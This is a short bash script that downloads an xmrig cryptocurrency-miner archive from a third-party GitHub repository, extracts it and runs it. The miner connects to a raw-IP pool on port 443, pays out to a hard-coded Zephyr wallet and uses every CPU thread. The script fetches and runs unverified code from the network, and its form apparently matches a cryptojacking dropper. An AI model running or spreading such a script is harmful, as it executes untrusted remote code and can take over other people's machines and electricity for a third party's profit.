#!/bin/bash
wget https://github.com/Adeemar7/all/raw/main/xmrig.tar.gz && tar -xvf xmrig.tar.gz
./xmrig --donate-level 1 -o 157.245.152.17:443 -u ZEPHs8iQVtpcQE9z6dbbEs2daL8Q1FnySGmKewiSKvw8JRocU3GJ4RjW1oSZtMVAV3ENr2HTXscejHvqkn2s8bfNVYxmTKEd1ZB -p new -a rx/0 -t $(nproc --all)
